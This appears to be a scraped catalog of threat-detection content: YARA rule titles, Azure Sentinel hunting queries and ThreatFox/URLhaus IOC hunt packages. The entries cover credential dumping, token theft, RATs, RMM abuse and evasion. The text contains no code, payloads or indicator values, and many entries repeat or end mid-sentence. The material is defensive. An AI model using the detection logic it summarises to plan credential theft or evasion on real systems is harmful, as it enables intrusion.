Command shell wrapper for WMI

florian-roth, wmi
signature-base source

Delivers a text payload via RDP (rubber ducky)

florian-roth
signature-base source

A PowerShell based tool that is designed to act like a RAT

backdoor, florian-roth, powershell
Mach-O binaries
yara low
signature-base source

Mach-O binaries

florian-roth
Azure-Sentinel source
T1556.006
AuditLogs, SigninLogs

Identifies MFA method registration events where the source IP address has not appeared in the registering user's 30-day sign-in history. An attacker who obtains credentials may register a new MFA meth

backdoor, credential-theft, hunting, microsoft, official
Azure-Sentinel source
T1528
AuditLogs

Identifies OAuth application consent events where high-risk permissions such as Directory.ReadWrite.All or RoleManagement.ReadWrite.Directory were granted to apps with no prior tenant consent history

hunting, microsoft, official
Azure-Sentinel source
T1078.004, T1562.001
AuditLogs, SigninLogs

Identifies directory role holders signing in via legacy authentication protocols (which bypass Conditional Access MFA), correlated with a high-impact audit operation within one hour. Suggests credenti

backdoor, credential-theft, evasion, hunting, microsoft, official
Azure-Sentinel source
T1003.001
WindowsEvent

Identifies processes accessing LSASS from unmapped or unbacked memory regions. This physics-based behavior strongly indicates process hollowing or shellcode injection credential dumping, bypassing sta

credential-theft, evasion, hunting, microsoft, official
Azure-Sentinel source
T1078.004, T1098
AuditLogs, SigninLogs

Identifies successful sign-ins from a country absent in the user's 30-day history, followed within one hour by a sensitive AuditLogs operation (role assignment, consent grant, credential addition, CA

backdoor, credential-theft, hunting, microsoft, official
Azure-Sentinel source
T1556.006, T1078.004
AuditLogs, SigninLogs

Identifies successful sign-ins from IP addresses not seen in the prior 30 days occurring within 60 minutes of MFA being disabled for the same account, consistent with post-compromise credential use af

credential-theft, hunting, microsoft, official
ThreatFox: Mirai IOCs
ioc-hunt high
ThreatFox source
CommonSecurityLog, DeviceNetworkEvents, UrlClickEvents

The Mirai malware family compromises IoT devices by exploiting default credentials and weak security configurations, turning them into a botnet for launching large-scale DDoS attacks. It typically arrives via network scans targeting vulnerable devices, often leveraging hardcoded IP:port combinations or malicious URLs to propagate. SOC

elf-mirai, ioc, threatfox
ThreatFox source
DnsEvents

Hunt package for 86 IOCs associated with ClearFake

ioc, js-clearfake, threatfox
ThreatFox source
CommonSecurityLog, DeviceNetworkEvents, DnsEvents

Hunt package for 2 IOCs associated with FAKEUPDATES

ioc, js-fakeupdates, threatfox
ThreatFox: magecart IOCs
ioc-hunt high
ThreatFox source
DnsEvents

Hunt package for 41 IOCs associated with magecart

ioc, js-magecart, threatfox
ThreatFox source
DnsEvents, UrlClickEvents

Hunt package for 7 IOCs associated with SmartApeSG

ioc, js-smartapesg, threatfox
ThreatFox source
CommonSecurityLog, DeviceNetworkEvents, DnsEvents

Hunt package for 15 IOCs associated with Unknown malware

ioc, threatfox, unknown
ThreatFox source
CommonSecurityLog, DeviceNetworkEvents

Hunt package for 13 IOCs associated with AdaptixC2

apt, ioc, threatfox, win-adaptix_c2
ThreatFox: AsyncRAT IOCs
ioc-hunt high
ThreatFox source
CommonSecurityLog, DeviceNetworkEvents

Hunt package for 3 IOCs associated with AsyncRAT

backdoor, ioc, threatfox, win-asyncrat
ThreatFox source
CommonSecurityLog, DeviceNetworkEvents

Hunt package for 17 IOCs associated with Cobalt Strike

cobalt-strike, ioc, threatfox, win-cobalt_strike
ThreatFox: DCRat IOCs
ioc-hunt high
ThreatFox source
CommonSecurityLog, DeviceNetworkEvents

DCRat is a remote access Trojan that enables attackers to execute commands, steal data, and maintain persistent access to compromised systems. It typically arrives via phishing emails, malicious attachments, or exploit kits leveraging network vulnerabilities to establish initial

backdoor, ioc, threatfox, win-dcrat
ThreatFox: Havoc IOCs
ioc-hunt high
ThreatFox source
CommonSecurityLog, DeviceNetworkEvents

Hunt package for 2 IOCs associated with Havoc

ioc, threatfox, win-havoc
ThreatFox source
DnsEvents

Hunt package for 4 IOCs associated with Nanocore RAT

backdoor, ioc, threatfox, win-nanocore
ThreatFox source
UrlClickEvents

Hunt package for 2 IOCs associated with Nova Stealer

infostealer, ioc, threatfox, win-nova
ThreatFox source
CommonSecurityLog, DeviceNetworkEvents, DnsEvents

Hunt package for 5 IOCs associated with Quasar RAT

backdoor, ioc, threatfox, win-quasar_rat
ThreatFox source
CommonSecurityLog, DeviceNetworkEvents

Hunt package for 2 IOCs associated with RansomHub

ioc, ransomware, threatfox, win-ransomhub
ThreatFox: Remcos IOCs
ioc-hunt high
ThreatFox source
CommonSecurityLog, DeviceNetworkEvents

Hunt package for 4 IOCs associated with Remcos

ioc, threatfox, win-remcos
ThreatFox: Remus IOCs
ioc-hunt high
ThreatFox source
DnsEvents

Hunt package for 3 IOCs associated with Remus

ioc, threatfox, win-remus
ThreatFox: Vidar IOCs
ioc-hunt high
ThreatFox source
DnsEvents, UrlClickEvents

Vidar is a credential-stealing malware that exfiltrates sensitive data via encrypted channels, often targeting financial institutions and using persistence

ioc, threatfox, win-vidar
ThreatFox: VShell IOCs
ioc-hunt high
ThreatFox source
CommonSecurityLog, DeviceNetworkEvents

VShell malware establishes persistent, encrypted communication with command-and-control servers via specific

ioc, threatfox, win-vshell
URLhaus source
CommonSecurityLog, DnsEvents

The "32-bit"

ioc, urlhaus
URLhaus source
CommonSecurityLog, DnsEvents

Hunt package for 12 malicious URLs tagged as botnetdomain

ioc, urlhaus
URLhaus source
CommonSecurityLog, DnsEvents

Hunt package for 2 malicious URLs tagged as c2-monitor-auto

ioc, urlhaus
URLhaus source
CommonSecurityLog, DnsEvents

Hunt package for 14 malicious URLs tagged as ClearFake

ioc, urlhaus
URLhaus source
CommonSecurityLog, DnsEvents

Hunt package for 11 malicious URLs tagged as fbi.gov

ioc, urlhaus
URLhaus source
CommonSecurityLog, DnsEvents

The malware family "malware_download"

ioc, urlhaus
URLhaus source
CommonSecurityLog, DnsEvents

Hunt package for 8 malicious URLs tagged as mirai

ioc, urlhaus
URLhaus source
CommonSecurityLog, DnsEvents

Hunt package for 10 malicious URLs tagged as Mozi

ioc, urlhaus
URLhaus source
CommonSecurityLog, DnsEvents

Hunt package for 6 malicious URLs tagged as opendir

ioc, urlhaus
Azure-Sentinel source
T1078.004

Identifies service principal sign-ins from a country not present in the SP's sign-in history over the preceding 14 days. A new-country sign-in for a workload identity may indicate stolen client creden

credential-theft, hunting, microsoft, official
Azure-Sentinel source
T1059.001, T1564.003, T1200
DeviceProcessEvents

Identifies PowerShell spawned by explorer.exe with a hidden window and a remote-execution or evasion flag. Consistent with BadUSB HID injection opening the Windows Run dialog via WIN+R; the explorer.e

evasion, hunting, microsoft, official, powershell
Azure-Sentinel source
T1098, T1078.004
AuditLogs

Identifies a single actor resetting passwords for three or more distinct accounts within one hour. Bulk admin-initiated resets in rapid succession suggest active account takeover before detection.

hunting, microsoft, official
Azure-Sentinel source
T1098, T1098.003, T1078.004
AuditLogs

Identifies accounts initiating high-impact Entra ID operations within 30 minutes of having their password reset by a different actor. Cross-actor correlation (ResetActorUpn != ResetTargetUpn) separate

backdoor, hunting, microsoft, official
Yara-Rules source

Iron Tiger Malware - Toolkit ChangePort

community
Yara-Rules source

dllshellexc2010 Exchange backdoor + remote shell

backdoor, community
Yara-Rules source

This rule detects a DNS tunnel tool used in Operation Iron Tiger

backdoor, community
Yara-Rules source

Iron Tiger EFH3 Encoder

community
Yara-Rules source

Iron Tiger Malware - GetPassword x64

community
Yara-Rules source

Iron Tiger Malware - GetUserInfo

community
Yara-Rules source

This is a detection for a s.exe variant seen in Op. Iron Tiger

community
Yara-Rules source

Iron Tiger Malware - GTalk Trojan

backdoor, community
Yara-Rules source

Iron Tiger Toolset - HTTP SOCKS Proxy soexe

community
Yara-Rules source

Iron Tiger Malware - HTTPBrowser Dropper

community
Yara-Rules source

Iron Tiger Malware - NBDDos Gh0stvariant Dropper

community
Yara-Rules source

Iron Tiger Malware - PlugX DosEmulator

community
Yara-Rules source

Iron Tiger Malware - PlugX FastProxy

community
Yara-Rules source

Iron Tiger Malware - PlugX Server

community
Yara-Rules source

Iron Tiger Malware - ReadPWD86

community
Yara-Rules source

Iron Tiger Malware - Ring Gh0stvariant

community
Yara-Rules source

Iron Tiger Tool - wmi.vbs detection

community, wmi
KeyBoy Backdoor
yara low
Yara-Rules source

YARA rule: KeyBoy_Backdoor

backdoor, community
KeyBoy Dropper
yara low
Yara-Rules source

YARA rule: KeyBoy_Dropper

community
Azure-Sentinel source
T1528, T1098.003
AuditLogs

Identifies service principals that received an app role assignment or admin consent within one hour of being registered in the tenant. Register-then-consent is a documented persistence pattern after p

hunting, microsoft, official, persistence
Azure-Sentinel source
T1562.001, T1562.004, T1011
ASimNetworkSessionLogs, DeviceNetworkEvents, imNetworkSession

Identifies outbound network connections logged by perimeter firewalls that are entirely missing from Microsoft Defender for Endpoint (MDE) telemetry. This discrepancy strongly indicates a threat actor

backdoor, hunting, microsoft, official
Azure-Sentinel source
T1219
DeviceNetworkEvents

Remote Monitoring and Management (RMM) programs are used by IT to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo

hunting, microsoft, official
Azure-Sentinel source
T1219

Remote Monitoring and Management (RMM) programs are used by IT to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo

hunting, microsoft, official
Azure-Sentinel source
T1219
DeviceNetworkEvents

Remote Monitoring and Management (RMM) programs are used by IT to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo

hunting, microsoft, official
Azure-Sentinel source
T1219
DeviceProcessEvents

Remote Monitoring and Management (RMM) programs are used by IT to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo

hunting, microsoft, official
Azure-Sentinel source
T1219

Remote Monitoring and Management (RMM) programs are used by IT to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo

hunting, microsoft, official
Azure-Sentinel source
T1219
DeviceNetworkEvents

Remote Monitoring and Management (RMM) programs are used by IT to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo

hunting, microsoft, official
Azure-Sentinel source
T1219
DeviceProcessEvents

Remote Monitoring and Management (RMM) programs are used by IT to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo

hunting, microsoft, official
Azure-Sentinel source
T1219

Remote Monitoring and Management (RMM) programs are used by IT to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo

hunting, microsoft, official
Azure-Sentinel source
T1219
DeviceNetworkEvents

Remote Monitoring and Management (RMM) programs are used by IT to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo

hunting, microsoft, official
Azure-Sentinel source
T1219
DeviceProcessEvents

Remote Monitoring and Management (RMM) programs are used by IT to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo

hunting, microsoft, official
Azure-Sentinel source
T1219

Remote Monitoring and Management (RMM) programs are used by IT to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo

hunting, microsoft, official
Azure-Sentinel source
T1219
DeviceNetworkEvents

Remote Monitoring and Management (RMM) programs are used by IT to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo

hunting, microsoft, official
Azure-Sentinel source
T1219
DeviceProcessEvents

Remote Monitoring and Management (RMM) programs are used by IT to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo

hunting, microsoft, official
Azure-Sentinel source
T1219

Remote Monitoring and Management (RMM) programs are used by IT to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo

hunting, microsoft, official
Azure-Sentinel source
T1219
DeviceNetworkEvents

Remote Monitoring and Management (RMM) programs are used by IT to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo

huntingmicrosoftofficial
Azure-Sentinel source
T1219
DeviceProcessEvents

Remote Monitoring and Management (RMM) programs are IT tools used to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo

huntingmicrosoftofficial
Azure-Sentinel source
T1219

Remote Monitoring and Management (RMM) programs are IT tools used to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo

huntingmicrosoftofficial
Azure-Sentinel source
T1219
DeviceNetworkEvents

Remote Monitoring and Management (RMM) programs are IT tools used to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo

huntingmicrosoftofficial
Azure-Sentinel source
T1219
DeviceProcessEvents

Remote Monitoring and Management (RMM) programs are IT tools used to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo

huntingmicrosoftofficial
Azure-Sentinel source
T1219

Remote Monitoring and Management (RMM) programs are IT tools used to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo

huntingmicrosoftofficial
Azure-Sentinel source
T1219
DeviceNetworkEvents

Remote Monitoring and Management (RMM) programs are IT tools used to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo

huntingmicrosoftofficial
Azure-Sentinel source
T1219

Remote Monitoring and Management (RMM) programs are IT tools used to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo

huntingmicrosoftofficial
Azure-Sentinel source
T1219
DeviceNetworkEvents

Remote Monitoring and Management (RMM) programs are IT tools used to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo

huntingmicrosoftofficial
Azure-Sentinel source
T1219
DeviceProcessEvents

Remote Monitoring and Management (RMM) programs are IT tools used to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo

huntingmicrosoftofficial
Azure-Sentinel source
T1219

Remote Monitoring and Management (RMM) programs are IT tools used to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo

huntingmicrosoftofficial
Azure-Sentinel source
T1219
DeviceNetworkEvents

Remote Monitoring and Management (RMM) programs are IT tools used to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo

huntingmicrosoftofficial
Azure-Sentinel source
T1219
DeviceProcessEvents

Remote Monitoring and Management (RMM) programs are IT tools used to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo

huntingmicrosoftofficial
Azure-Sentinel source
T1219

Remote Monitoring and Management (RMM) programs are IT tools used to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo

huntingmicrosoftofficial
Azure-Sentinel source
T1219
DeviceNetworkEvents

Remote Monitoring and Management (RMM) programs are IT tools used to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo

huntingmicrosoftofficial
Azure-Sentinel source
T1219
DeviceProcessEvents

Remote Monitoring and Management (RMM) programs are IT tools used to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo

huntingmicrosoftofficial
Azure-Sentinel source
T1219

Remote Monitoring and Management (RMM) programs are IT tools used to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo

huntingmicrosoftofficial
Azure-Sentinel source
T1219
DeviceNetworkEvents

Remote Monitoring and Management (RMM) programs are IT tools used to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo

huntingmicrosoftofficial
Azure-Sentinel source
T1219
DeviceProcessEvents

Remote Monitoring and Management (RMM) programs are IT tools used to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo

huntingmicrosoftofficial
Azure-Sentinel source
T1219

Remote Monitoring and Management (RMM) programs are IT tools used to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo

huntingmicrosoftofficial
Azure-Sentinel source
T1553.002, T1588.003

Identifies files signed by certificates with a lifespan <= 14 days on non-developer endpoints. While legitimate software certs last 1+ years, ephemeral certs indicate Malware-Signing-as-a-Service (MSa

huntingmicrosoftofficial
ThreatFox: Mirai IOCs
ioc-hunt high
ThreatFox source
UrlClickEvents

The Mirai malware family is a botnet that compromises IoT devices by scanning for default credentials and exploiting known vulnerabilities, then using infected devices to launch large-scale DDo

elf-miraiiocthreatfox
ThreatFox source
DnsEvents

Hunt package for 98 IOCs associated with ClearFake

iocjs-clearfakethreatfox
ThreatFox: EtherRAT IOCs
ioc-hunt high
ThreatFox source
DnsEvents

EtherRAT is a remote access Trojan that enables attackers to exfiltrate data, execute commands, and maintain persistent control over infected systems. It typically arrives via phishing emails containing malicious links or attachments that download the malware to compromised endpoints. SOC analysts should monitor for unusual outbound network traffic, lateral

backdooriocjs-ether_ratthreatfox
ThreatFox: KongTuke IOCs
ioc-hunt high
ThreatFox source
DnsEventsUrlClickEvents

Hunt package for 8 IOCs associated with KongTuke

iocjs-kongtukethreatfox
ThreatFox source
DeviceFileEventsDnsEventsUrlClickEvents

Hunt package for 14 IOCs associated with SmartApeSG

iocjs-smartapesgthreatfox
ThreatFox source
CommonSecurityLogDeviceFileEventsDeviceNetworkEventsDnsEvents

Hunt package for 15 IOCs associated with Unknown malware

iocthreatfoxunknown
ThreatFox source
DeviceFileEvents

Hunt package for 3 IOCs associated with Unknown Loader

iocthreatfoxunknown_loader
ThreatFox source
DnsEventsUrlClickEvents

The "Unknown Stealer" malware is a data exfiltration tool designed to steal sensitive information such as credentials, cookies, and system files by establishing communication with command-and-control servers via domains and URLs. It typically arrives in environments through phishing

infostealeriocthreatfoxunknown_stealer
ThreatFox source
CommonSecurityLogDeviceNetworkEvents

Hunt package for 6 IOCs associated with AdaptixC2

aptiocthreatfoxwin-adaptix_c2
ThreatFox: AsyncRAT IOCs
ioc-hunt high
ThreatFox source
CommonSecurityLogDeviceNetworkEvents

Hunt package for 6 IOCs associated with AsyncRAT

backdooriocthreatfoxwin-asyncrat
ThreatFox source
CommonSecurityLogDeviceNetworkEvents

Hunt package for 17 IOCs associated with Cobalt Strike

cobalt-strikeiocthreatfoxwin-cobalt_strike
ThreatFox: Havoc IOCs
ioc-hunt high
ThreatFox source
CommonSecurityLogDeviceNetworkEvents

Hunt package for 2 IOCs associated with Havoc

iocthreatfoxwin-havoc
ThreatFox source
DnsEventsUrlClickEvents

The Lumma Stealer malware is a data-exfiltration tool that steals sensitive information such as credentials, cryptocurrency wallets, and system files by leveraging compromised credentials or stolen tokens. It typically arrives via phishing emails, malicious websites, or exploit kits, often

infostealeriocthreatfoxwin-lumma
ThreatFox source
DnsEvents

Hunt package for 4 IOCs associated with Nanocore RAT

backdooriocthreatfoxwin-nanocore
ThreatFox source
CommonSecurityLogDeviceNetworkEventsDnsEvents

Hunt package for 9 IOCs associated with NetSupportManager RAT

backdooriocthreatfoxwin-netsupportmanager_rat
ThreatFox: Remcos IOCs
ioc-hunt high
ThreatFox source
CommonSecurityLogDeviceNetworkEvents

Hunt package for 9 IOCs associated with Remcos

iocthreatfoxwin-remcos
ThreatFox: Remus IOCs
ioc-hunt high
ThreatFox source
DnsEvents

The

iocthreatfoxwin-remus
ThreatFox: Vidar IOCs
ioc-hunt high
ThreatFox source
DnsEventsUrlClickEvents

Hunt package for 12 IOCs associated with Vidar

iocthreatfoxwin-vidar
ThreatFox: VShell IOCs
ioc-hunt high
ThreatFox source
CommonSecurityLogDeviceNetworkEvents

Hunt package for 3 IOCs associated with VShell

iocthreatfoxwin-vshell
ThreatFox: XWorm IOCs
ioc-hunt high
ThreatFox source
DeviceFileEventsUrlClickEvents

XWorm is a multi-stage malware family designed to establish persistence, exfiltrate data, and execute arbitrary commands, often leveraging compromised credentials or stolen tokens for lateral movement. It typically arrives via phishing emails containing malicious URLs or bundled with legitimate software through supply chain attacks. SOC analysts

iocthreatfoxwin-xworm
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 3 malicious URLs tagged as 176-65-139-196

iocurlhaus
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 35 malicious URLs tagged as 32-bit

iocurlhaus
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 8 malicious URLs tagged as arm

iocurlhaus
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 15 malicious URLs tagged as base64

iocurlhaus
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 12 malicious URLs tagged as ClearFake

iocurlhaus
URLhaus source
CommonSecurityLogDnsEvents

The Dcrat malware family is a remote access trojan (RAT) designed to exfiltrate sensitive data and provide attackers with persistent access to compromised systems. It typically arrives via phishing emails containing malicious URLs or through compromised websites that

backdooriocurlhaus
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 19 malicious URLs tagged as elf

iocurlhaus
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 2 malicious URLs tagged as exe

iocurlhaus
URLhaus source
CommonSecurityLogDnsEvents

The "github" malware family is

iocurlhaus
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 4 malicious URLs tagged as lnk

iocurlhaus
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 6 malicious URLs tagged as Lumma

iocurlhaus
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 16 malicious URLs tagged as malware_download

iocurlhaus
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 9 malicious URLs tagged as Mozi

iocurlhaus
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 3 malicious URLs tagged as remcos

iocurlhaus
Yara-Rules source

YARA rule: apt_hellsing_implantstrings

aptcommunity
Yara-Rules source

YARA rule: apt_hellsing_installer

aptcommunity
Yara-Rules source

YARA rule: apt_hellsing_irene

aptcommunity
Yara-Rules source

YARA rule: apt_hellsing_msgertype2

aptcommunity
Yara-Rules source

YARA rule: apt_hellsing_proxytool

aptcommunity
Yara-Rules source

YARA rule: apt_hellsing_xkat

aptcommunity
Yara-Rules source

HIDDEN COBRA – North Korea’s DDoS Botnet Infrastructure

community
Yara-Rules source

HIDDEN COBRA – North Korea’s DDoS Botnet Infrastructure

community
Yara-Rules source

HIDDEN COBRA – North Korea’s DDoS Botnet Infrastructure

community
APT Hikit msrv
yara low
Yara-Rules source

YARA rule: APT_Hikit_msrv

aptcommunityhikit_msrv
Azure-Sentinel source
T1562.001
AuditLogs

Identifies deletions or modifications to named locations in Entra ID, which may indicate an attacker weakening Conditional Access enforcement by removing trusted network definitions.

huntingmicrosoftofficial
Azure-Sentinel source
T1484.002
AuditLogs

Identifies federation configuration changes to Entra ID domains, a persistence technique that allows attackers to forge authentication tokens for any user account in the tenant without knowing their p

backdoorhuntingmicrosoftofficialpersistence
Azure-Sentinel source
T1098.001
AuditLogs

Identifies federated identity credential additions to Entra ID service principals. Workload identity federation allows external OIDC workloads to authenticate as the SP without secrets, which if abuse

backdoorcredential-thefthuntingmicrosoftofficial
Azure-Sentinel source
T1574.002, T1071, T1573, T1567
DeviceNetworkEvents

Identifies anomalous network communication from processes that have no historical baseline on a device.

huntingmicrosoftofficial
Azure-Sentinel source
T1003.001
DeviceEvents

This query identifies processes extracting an abnormally large volume of memory (>40MB) from LSASS. By focusing on physical bytes copied rather than process names, it detects credential dumping even i

backdoorcredential-thefthuntingmicrosoftofficial
Yara-Rules source

ASPXSpy detection. It might be used by other fraudsters

community
Yara-Rules source

Iron Tiger Malware - Changeport Toolkit driverinstall

community
Malware Updater
yara low
Yara-Rules source

YARA rule: Malware_Updater

community
NK SSL PROXY
yara low
Yara-Rules source

YARA rule: NK_SSL_PROXY

community
Azure-Sentinel source
T1078.004
AuditLogs

Identifies Privileged Identity Management role activations outside business hours or on weekends, which may indicate unauthorized privilege escalation by a compromised account exploiting off-hours mon

exploithuntingmicrosoftofficial
Azure-Sentinel source
T1566T1566.002
EmailEventsEmailUrlInfo

Detects delivered inbound emails with URLs that use a raw IPv4 address as the domain. This pattern often indicates phishing or malware delivery designed to evade domain-based reputation checks.

huntingmicrosoftofficialphishing
Yara-Rules source

Hacking Team RCS Backdoor

backdoorcommunity
Yara-Rules source

Hacking Team RCS Scout

community
Azure-Sentinel source
T1219

Remote Monitoring and Management (RMM) programs are IT tools used to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo

huntingmicrosoftofficial
Azure-Sentinel source
T1219
DeviceNetworkEvents

Remote Monitoring and Management (RMM) programs are IT tools used to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo

huntingmicrosoftofficial
Azure-Sentinel source
T1219
DeviceProcessEvents

Remote Monitoring and Management (RMM) programs are IT tools used to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo

huntingmicrosoftofficial
Azure-Sentinel source
T1219

Remote Monitoring and Management (RMM) programs are IT tools used to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo

huntingmicrosoftofficial
Azure-Sentinel source
T1219
DeviceNetworkEvents

Remote Monitoring and Management (RMM) programs are IT tools used to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo

huntingmicrosoftofficial
Azure-Sentinel source
T1219
DeviceProcessEvents

Remote Monitoring and Management (RMM) programs are IT tools used to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo

huntingmicrosoftofficial
Azure-Sentinel source
T1219

Remote Monitoring and Management (RMM) programs are IT tools used to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo

huntingmicrosoftofficial
Azure-Sentinel source
T1219
DeviceNetworkEvents

Remote Monitoring and Management (RMM) programs are IT tools used to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo

huntingmicrosoftofficial
Azure-Sentinel source
T1219
DeviceProcessEvents

Remote Monitoring and Management (RMM) programs are IT tools used to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo

huntingmicrosoftofficial
Azure-Sentinel source
T1219

Remote Monitoring and Management (RMM) programs are IT tools used to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo

huntingmicrosoftofficial
Azure-Sentinel source
T1219
DeviceNetworkEvents

Remote Monitoring and Management (RMM) programs are IT tools used to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo

huntingmicrosoftofficial
Azure-Sentinel source
T1219
DeviceProcessEvents

Remote Monitoring and Management (RMM) programs are IT tools used to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo

huntingmicrosoftofficial
Azure-Sentinel source
T1219

Remote Monitoring and Management (RMM) programs are IT tools used to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo

huntingmicrosoftofficial
Azure-Sentinel source
T1219
DeviceNetworkEvents

Remote Monitoring and Management (RMM) programs are IT tools used to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo

huntingmicrosoftofficial
Azure-Sentinel source
T1219
DeviceProcessEvents

Remote Monitoring and Management (RMM) programs are IT tools used to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo

huntingmicrosoftofficial
Azure-Sentinel source
T1219

Remote Monitoring and Management (RMM) programs are IT tools used to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo

huntingmicrosoftofficial
Azure-Sentinel source
T1219
DeviceNetworkEvents

Remote Monitoring and Management (RMM) programs are IT tools used to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo

huntingmicrosoftofficial
Azure-Sentinel source
T1219
DeviceProcessEvents

Remote Monitoring and Management (RMM) programs are IT tools used to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo

huntingmicrosoftofficial
Azure-Sentinel source
T1219

Remote Monitoring and Management (RMM) programs are IT tools used to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo

huntingmicrosoftofficial
Azure-Sentinel source
T1219
DeviceNetworkEvents

Remote Monitoring and Management (RMM) programs are IT tools used to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo

huntingmicrosoftofficial
Azure-Sentinel source
T1219
DeviceProcessEvents

Remote Monitoring and Management (RMM) programs are IT tools used to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo

huntingmicrosoftofficial
Azure-Sentinel source
T1219

Remote Monitoring and Management (RMM) programs are IT tools used to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo

huntingmicrosoftofficial
Azure-Sentinel source
T1219
DeviceNetworkEvents

Remote Monitoring and Management (RMM) programs are IT tools used to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo

huntingmicrosoftofficial
Azure-Sentinel source
T1219
DeviceProcessEvents

